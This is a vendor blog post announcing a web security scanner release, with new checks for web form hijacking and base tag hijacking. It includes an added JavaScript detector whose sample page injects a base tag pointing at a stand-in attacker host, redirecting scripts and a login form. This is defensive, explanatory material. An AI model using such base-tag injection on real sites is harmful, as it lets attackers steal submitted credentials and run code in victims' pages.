Netsparker 4.1 Release – New Security Checks and Improvements

In this new version of Netsparker Desktop there are two new security checks, for web form hijacking and base tag hijacking, and we also have a good number of improvements and bug fixes. Read this blog post for more information on what is new and improved in the only false-positive-free web application security scanner.

Today we are announcing the release of Netsparker Desktop 4.1. This new version includes a number of new web application security checks and improvements, as explained below.

Web Form Hijacking Security Check

Web form hijacking is the exploitation of a vulnerable form that allows the attacker to steal the content submitted through that form. For a successful attack, the attacker leads the victim to open and fill in the form via a specially crafted URL that exploits the vulnerability. Once exploited, the form's POST data is sent to a server the attacker controls, giving the attacker access to that data.

Base Tag Hijacking Web Security Check

When a web application is vulnerable to base tag hijacking, attackers are able to control the href attribute of the HTML base tag. Because relative URLs on the page are resolved against that base, the attackers can have images, JavaScript and other resources loaded from a domain they control and executed in the context of the page. The impact of this vulnerability is almost the same as that of a cross-site scripting vulnerability.
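To make the effect described in the two sections above concrete, here is an added example (not Netsparker's code) that resolves a page's relative script, image and form-action references the way a browser does, honouring an injected base href, and flags those that end up on a different origin. The page URL, host names and HTML are constructed samples on the reserved .example TLD.

```javascript
// Added example, not Netsparker code: resolve relative references as a browser
// would (against <base href> when present) and flag off-origin results.
// Uses only Node's built-in URL class.

const BASE_RE = /<base\b[^>]*\bhref\s*=\s*["']([^"']+)["']/i;
// Heuristic matcher for the elements whose relative URLs a <base> tag redirects:
// script/img/link sources and form actions. Not a full HTML parser.
const REF_RE = /<(script|img|link|form)\b[^>]*\b(?:src|href|action)\s*=\s*["']([^"']+)["']/gi;

// One record per reference: tag, raw attribute value, the URL a browser would
// actually request, and whether that URL leaves the page's origin.
function resolveReferences(html, pageUrl) {
  const pageOrigin = new URL(pageUrl).origin;
  const baseMatch = html.match(BASE_RE);
  // A <base href> may itself be relative; browsers resolve it against the page URL.
  const base = baseMatch ? new URL(baseMatch[1], pageUrl).href : pageUrl;
  const records = [];
  for (const m of html.matchAll(REF_RE)) {
    const resolved = new URL(m[2], base);
    records.push({ tag: m[1].toLowerCase(), ref: m[2], resolved: resolved.href,
                   offOrigin: resolved.origin !== pageOrigin });
  }
  return records;
}

// Scanner-style check: report every reference that resolves off the page's
// origin. A real scanner would also allow-list known CDN origins.
function findHijackedReferences(html, pageUrl) {
  return resolveReferences(html, pageUrl).filter(r => r.offOrigin);
}

// Constructed sample page (hypothetical hosts on the reserved .example TLD).
const PAGE_URL = 'https://shop.example/account/';
const SAFE_HTML =
  '<html><head><script src="/static/app.js"></script></head>' +
  '<body><img src="logo.png"><form method="post" action="login">' +
  '<input name="password"></form></body></html>';
// The same page after an attacker-controlled value is reflected into <base href>:
// the script, the image and the login POST now all go to the attacker's host.
const HIJACKED_HTML =
  '<html><head><base href="https://attacker.example/">' + SAFE_HTML.slice('<html><head>'.length);

if (typeof require !== 'undefined' && require.main === module) {
  console.log(findHijackedReferences(SAFE_HTML, PAGE_URL));     // []
  console.log(findHijackedReferences(HIJACKED_HTML, PAGE_URL)); // three off-origin references
}
```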

Other Major Improvements

Detection of Backup Files on Websites

In this version we also improved the scanner's detection of backup files on websites. Backup files do not have a direct impact on the security of a website; unlike a SQL injection vulnerability, they do not on their own let an attacker reach the backend database. However, if discovered, some of them may contain information that helps attackers craft their attack, so it is good to know about them as well.

Configuration of Backup Files Signatures

We also moved the Backup Files signatures to the Scan Policy Editor, allowing users to modify the list of signatures and easily add their own, as shown in the screenshot below.

Configuring backup files security check using the Netsparker Scan Policy Editor

Detection of Common Directories on Websites

Similar to backup files, common directories do not have a direct impact on the security of a website, though they can definitely ease an attacker's job. For example, an attacker would pay more attention to a directory called /admin/ than to one called /samples/.

Netsparker 4.1 ChangeLog

The above are just the major highlights for this version of Netsparker. For a complete list of all that has been improved and fixed refer to the Netsparker Desktop changelog.

Upgrading Netsparker Web Application Security Scanner

If you are already using Netsparker Web Application Security Scanner, a pop-up window with the upgrade details will appear the next time you run Netsparker. Alternatively, you can always click Check for Updates in the Help drop-down menu to check for updates manually.

If you have problems with the upgrade or product-related queries, get in touch with our awesome support team by sending an email to support@invicti.com.